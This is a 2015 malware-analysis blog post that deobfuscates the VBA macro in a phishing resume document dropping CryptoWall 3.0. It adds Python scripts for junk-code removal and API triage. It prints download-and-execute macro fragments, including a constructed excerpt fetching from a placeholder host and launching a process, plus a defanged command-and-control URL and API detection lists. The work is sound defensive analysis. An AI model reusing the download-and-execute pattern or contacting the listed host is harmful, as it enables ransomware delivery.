Thursday, August 13, 2015

Cryptowall 3.0 downloaded and executed from "William_Isabella_resume.doc"

Recently I was provided a phishing email with an attachment called "William_Isabella_resume.doc". As I had done in the previous post, I used "./oledump.py William_Isabella_resume.doc" to examine the document's streams for a malicious macro. Below is the output of that command.

./oledump.py William_Isabella_resume.doc
 A: word/vbaProject.bin
 A1:       375 'PROJECT'
 A2:        41 'PROJECTwm'
 A3: M   40002 'VBA/ThisDocument'
 A4:      8271 'VBA/_VBA_PROJECT'
 A5:       514 'VBA/dir'

As you can see, item A3 is flagged with M, meaning it contains a macro. Selecting stream A3 with -s and decompressing the VBA source with -v, I wrote the macro out to a text file.

./oledump.py -s A3 -v William_Isabella_resume.doc > macro.txt

I immediately started looking at the macro and noticed a pattern of lines that was repeated with variable names of varying length but with the same structure. Two examples of the pattern are below:

Dim ACIZjEo8pvcIr As Long, I3wVba3qWHhnCuC As Long
ACIZjEo8pvcIr = 80
I3wVba3qWHhnCuC = 19
If ACIZjEo8pvcIr + I3wVba3qWHhnCuC > 4 Then
I3wVba3qWHhnCuC = ACIZjEo8pvcIr + 29
Else
MsgBox 45
End If

Dim AI9EyT0hz As Long, LDwIMi8qU8zv As Long
AI9EyT0hz = 55
LDwIMi8qU8zv = 92
If AI9EyT0hz + LDwIMi8qU8zv > 4 Then
LDwIMi8qU8zv = AI9EyT0hz + 8
Else
MsgBox 87
End If

With this pattern I wanted to create a regular expression that first finds only lines matching the following form: Dim <var> As Long, <var> As Long

So I used the following grep command to build my population: cat macro.txt | egrep "Dim.*"
**Dim Nz7m0PxKYWw As Long, HbS1melaNAS7H As Long, L7N3MtqbtznJ As Byte, HmKeQofQiXVxVGCT() As Byte, L9EY5PIy8XL As Long
Dim LvAzbXXkWUDtDQ() As Byte
Dim ACIZjEo8pvcIr As Long, I3wVba3qWHhnCuC As Long
**Dim FP3AL83PNIVhYqp As Long, Bhu6AVZ As Long, HzD7nSW As Long, IFHWQgDBF4yZ As String * 8162, JkOPSi As String, I0xSQ As Integer, YBoXWN0Xv As Double
Dim AI9EyT0hz As Long, LDwIMi8qU8zv As Long
Dim BkbpvlCIZj As Long, VS1rCLO33mU As Long
Dim ILWUKAm As Long, JRN9ZgNj6Yf As Long
Dim WqZT6KvAVkyO As Long, OHPW2b0ZGFa As Long
Dim HbUu4uL As Long, GfUsdMAvdCRNJDXy8 As Long
Dim AizpYIBM As Long, BYtWR9n2OwKs As Long
Dim Izv2Cof As Long, Ntxt3NxnUsY As Long
Dim V0fF89S As Long, HVcFPWU6 As Long
Dim K1Xi As Long, QZlNuLHUlh7Q2xe As Long
<..snip..>

So I started with the above population. Notice that there are a couple of lines that I have preceded with a double asterisk; these declare more than two variables and the regular expression must not match them. Using rubular.com I derived a regular expression that matches only Dim <var> As Long, <var> As Long.

Then I used egrep to test the regular expression and display the next 7 lines after each match (-A 7), to see whether I was pulling any false positives into my population.

$ cat macro.txt | egrep '^Dim\s[A-Za-z0-9]{4,20}\sAs\sLong,\s[A-Za-z0-9]{4,20}\sAs\sLong\s$' -A 7
Dim ACIZjEo8pvcIr As Long, I3wVba3qWHhnCuC As Long
ACIZjEo8pvcIr = 80
I3wVba3qWHhnCuC = 19
If ACIZjEo8pvcIr + I3wVba3qWHhnCuC > 4 Then
I3wVba3qWHhnCuC = ACIZjEo8pvcIr + 29
Else
MsgBox 45
End If
--
Dim AI9EyT0hz As Long, LDwIMi8qU8zv As Long
AI9EyT0hz = 55
LDwIMi8qU8zv = 92
If AI9EyT0hz + LDwIMi8qU8zv > 4 Then
LDwIMi8qU8zv = AI9EyT0hz + 8
Else
MsgBox 87
End If
--

Scanning through the results, no false positives were noticed. Now the trick is to use the regular expression and delete the 7 lines that follow each match. The 'sed' tool can do this. In sed's default (basic) regex syntax the interval braces '{' and '}' must be escaped as '\{' and '\}'; the '\s' class and the ',+7' address range are GNU sed extensions. Running the following command, which deletes each matching line together with the 7 lines after it, removed the repeating pattern from the macro.

$ cat macro.txt | sed '/^Dim\s[A-Za-z0-9]\{4,20\}\sAs\sLong,\s[A-Za-z0-9]\{4,20\}\sAs\sLong\s$/,+7d' > modified.macro.txt

Using the command above, I reduced the macro from 671 lines to 287 lines of code:

$ wc -l macro.txt 
671 macro.txt

$ wc -l modified.macro.txt 
287 modified.macro.txt
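The grep-then-sed procedure above deletes the 7 lines after every header match without looking at them; the manual "-A 7" check is what protects against deleting real code. The following added example (my own code, not from the original post) does the same junk removal in Python, but verifies that the 7 lines after each header actually have the assign/assign/If/assign/Else/MsgBox/End If shape seen in the post before deleting them, and reports any header whose body differs so it can be reviewed by hand. The sample macro text is constructed: it reuses the two junk blocks from the post and adds a declaration with hypothetical names (hInet, hConn) that the header regex alone would also match.

```python
import re
import sys

# Signature of the junk-code block: the "Dim <var> As Long, <var> As Long" header
# the post's egrep/sed regex matches. \s*$ also tolerates a trailing \r (CRLF).
JUNK_HEADER = re.compile(
    r"^Dim\s[A-Za-z0-9]{4,20}\sAs\sLong,\s[A-Za-z0-9]{4,20}\sAs\sLong\s*$"
)

# Expected shape of the 7 lines that follow the header (derived from the two
# samples in the post). sed deletes them blindly; here each one is verified.
JUNK_BODY = [
    re.compile(r"^\w+ = \d+$"),
    re.compile(r"^\w+ = \d+$"),
    re.compile(r"^If \w+ \+ \w+ > \d+ Then$"),
    re.compile(r"^\w+ = \w+ \+ \d+$"),
    re.compile(r"^Else$"),
    re.compile(r"^MsgBox \d+$"),
    re.compile(r"^End If$"),
]


def strip_junk_blocks(text):
    """Remove every verified junk block (header + 7 body lines) from macro text.

    Returns (kept_lines, removed_blocks, flagged_headers). flagged_headers are
    header matches whose following lines did NOT fit the junk shape; they are
    kept in the output and reported for manual review instead of being deleted.
    """
    lines = text.splitlines()  # splitlines() handles \r\n as well as \n
    kept, flagged = [], []
    removed = 0
    i = 0
    while i < len(lines):
        line = lines[i].rstrip()
        if JUNK_HEADER.match(line):
            body = [b.rstrip() for b in lines[i + 1 : i + 1 + len(JUNK_BODY)]]
            if len(body) == len(JUNK_BODY) and all(
                pat.match(b) for pat, b in zip(JUNK_BODY, body)
            ):
                removed += 1
                i += 1 + len(JUNK_BODY)  # skip the header and its 7 body lines
                continue
            flagged.append(line)  # header-shaped line with a real body: keep it
        kept.append(lines[i])
        i += 1
    return kept, removed, flagged


def summarize(text):
    """Line counts before/after, as the post checks with wc -l."""
    kept, removed, flagged = strip_junk_blocks(text)
    return {
        "lines_before": len(text.splitlines()),
        "lines_after": len(kept),
        "blocks_removed": removed,
        "flagged_headers": flagged,
    }


# Constructed sample in the shape of the dumped macro (CRLF line endings, as a
# VBA dump often has). Not the original file: two junk blocks from the post plus
# a hypothetical real declaration (hInet/hConn) the header regex also matches.
SAMPLE_MACRO = "\r\n".join([
    "Dim Nz7m0PxKYWw As Long, HbS1melaNAS7H As Long, L7N3MtqbtznJ As Byte",
    "Dim ACIZjEo8pvcIr As Long, I3wVba3qWHhnCuC As Long",
    "ACIZjEo8pvcIr = 80",
    "I3wVba3qWHhnCuC = 19",
    "If ACIZjEo8pvcIr + I3wVba3qWHhnCuC > 4 Then",
    "I3wVba3qWHhnCuC = ACIZjEo8pvcIr + 29",
    "Else",
    "MsgBox 45",
    "End If",
    "Dim hInet As Long, hConn As Long",  # hypothetical names, real-looking code
    "hInet = InternetOpenA(sAgent, 1, vbNullString, vbNullString, 0)",
    "If hInet <> 0 Then",
    "hConn = InternetOpenUrlA(hInet, sUrl, vbNullString, 0, 0, 0)",
    "End If",
    "Dim AI9EyT0hz As Long, LDwIMi8qU8zv As Long",
    "AI9EyT0hz = 55",
    "LDwIMi8qU8zv = 92",
    "If AI9EyT0hz + LDwIMi8qU8zv > 4 Then",
    "LDwIMi8qU8zv = AI9EyT0hz + 8",
    "Else",
    "MsgBox 87",
    "End If",
    "lRet = CreateProcessA(vbNullString, sExe, 0, 0, 0, 0, 0, vbNullString, si, pi)",
]) + "\r\n"


if __name__ == "__main__":
    # Usage: python strip_junk.py macro.txt > modified.macro.txt
    if len(sys.argv) > 1:
        with open(sys.argv[1], errors="replace") as fh:
            src = fh.read()
    else:
        src = SAMPLE_MACRO
    kept, removed, flagged = strip_junk_blocks(src)
    print("\n".join(kept))
    print(f"# removed {removed} junk block(s); {len(flagged)} header(s) kept for review",
          file=sys.stderr)
```

On the constructed sample the two junk blocks are removed (23 lines down to 7) while the hInet/hConn declaration, which sed's ",+7d" would have deleted along with the InternetOpenA and InternetOpenUrlA calls after it, is kept and listed under flagged_headers.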

Then, sifting through what is left, a couple of key functions are noticed:
FP3AL83PNIVhYqp = InternetOpenA(

The macro then checks whether FP3AL83PNIVhYqp, the handle returned by InternetOpenA, is non-zero. You can look up InternetOpenA online to understand what it does. The user agent string passed to it is the following:
Mozilla/4.0(compatiable; MSIE 6.0; Windows NT 5.1; FSL 7.0.6.01001)

Bhu6AVZ = InternetOpenUrlA(

The InternetOpenUrlA call above pulls down the CryptoWall malware as a file called 1.jpg. The 1.jpg is the CryptoWall malware, but in scrambled form. It is then saved to the "C:\users\<user>\AppData\Roaming" folder as an executable file.

Further along in the macro's flow, another function launches that executable as a new process with "CreateProcessA". The executable then sends a POST request to the following URL:

URL: hxxp://fortecegypt.com/blog/wp-content/themes/twentyfourteen/rrr.php?g=pzh8956b2ulluj
POST DATA: z=b8bc08ed80fdb74f01125a4d61b6879af88a5aa0f09dd28ee540b25c983ae350ad13f2a891d7b22fdddc7797fef1800cf4360057
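Once the junk is gone, the remaining macro is small enough to triage by scanning for the Win32 calls the post singles out (InternetOpenA, InternetOpenUrlA, CreateProcessA) and for string literals that carry indicators (the user agent, the download URL, the dropped file name). The following added example (my own code, not from the original post) does that: it groups the API names it finds into "network" and "execution", pulls string literals out of each line and buckets them, and returns a download-and-execute verdict when both groups are present. The macro excerpt it scans is constructed to resemble the cleaned macro; the user agent string is the one quoted above, the 1.jpg URL is a placeholder (the post does not give it), and the variable names other than those quoted in the post are hypothetical.

```python
import json
import re
import sys

# Win32 / VBA calls worth flagging in a cleaned macro, grouped by what they
# enable. Matching is on whole words, so "Shell" does not match "ShellExecuteA".
API_GROUPS = {
    "network": ["InternetOpenA", "InternetOpenUrlA", "InternetReadFile",
                "URLDownloadToFileA"],
    "execution": ["CreateProcessA", "ShellExecuteA", "WinExec", "Shell"],
}
STRING_LITERAL = re.compile(r'"([^"]*)"')


def classify_literal(s):
    """Bucket a VBA string literal into the indicator types the post recovers."""
    low = s.lower()
    if "://" in low or low.startswith(("hxxp", "http")):
        return "url"
    if s.startswith("Mozilla/"):
        return "user_agent"
    if low.endswith(".exe"):
        return "executable"
    return None


def triage_macro(text):
    """Return flagged APIs per group, string indicators, and an overall verdict."""
    apis = {group: set() for group in API_GROUPS}
    indicators = {"url": [], "user_agent": [], "executable": []}
    for line in text.splitlines():
        for group, names in API_GROUPS.items():
            for name in names:
                if re.search(r"\b" + re.escape(name) + r"\b", line):
                    apis[group].add(name)
        for literal in STRING_LITERAL.findall(line):
            kind = classify_literal(literal)
            if kind and literal not in indicators[kind]:
                indicators[kind].append(literal)
    if apis["network"] and apis["execution"]:
        verdict = "download-and-execute"
    elif apis["network"]:
        verdict = "network-capable"
    elif apis["execution"]:
        verdict = "executes-process"
    else:
        verdict = "no-flagged-api"
    return {
        "apis": {group: sorted(found) for group, found in apis.items()},
        "indicators": indicators,
        "verdict": verdict,
    }


# Constructed excerpt in the shape of the cleaned macro (not the original file).
# The URL is a placeholder; sPath/si/pi/lRet are hypothetical names.
CLEANED_MACRO = "\n".join([
    'Private Declare Function InternetOpenA Lib "wininet.dll" (ByVal sAgent As String, '
    'ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, '
    'ByVal lFlags As Long) As Long',
    'Private Declare Function InternetOpenUrlA Lib "wininet.dll" (ByVal hInternetSession As Long, '
    'ByVal sUrl As String, ByVal sHeaders As String, ByVal lHeadersLength As Long, '
    'ByVal lFlags As Long, ByVal lContext As Long) As Long',
    'JkOPSi = "Mozilla/4.0(compatiable; MSIE 6.0; Windows NT 5.1; FSL 7.0.6.01001)"',
    'FP3AL83PNIVhYqp = InternetOpenA(JkOPSi, 1, vbNullString, vbNullString, 0)',
    'If FP3AL83PNIVhYqp <> 0 Then',
    'Bhu6AVZ = InternetOpenUrlA(FP3AL83PNIVhYqp, "hxxp://placeholder.invalid/1.jpg", '
    'vbNullString, 0, 0, 0)',
    'End If',
    'sPath = Environ("APPDATA") & "\\payload.exe"',
    'lRet = CreateProcessA(vbNullString, sPath, 0, 0, 0, 0, 0, vbNullString, si, pi)',
])


if __name__ == "__main__":
    # Usage: python triage_macro.py modified.macro.txt
    if len(sys.argv) > 1:
        with open(sys.argv[1], errors="replace") as fh:
            src = fh.read()
    else:
        src = CLEANED_MACRO
    print(json.dumps(triage_macro(src), indent=2))
```

The string literals are what feed the blocklist: the user agent with its "compatiable" misspelling is a usable network signature, and the URL and dropped file name go straight into proxy and endpoint detections. Note that the scanner sees both the Declare lines and the call sites, which is intended: a macro that merely declares wininet imports is already worth a closer look.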

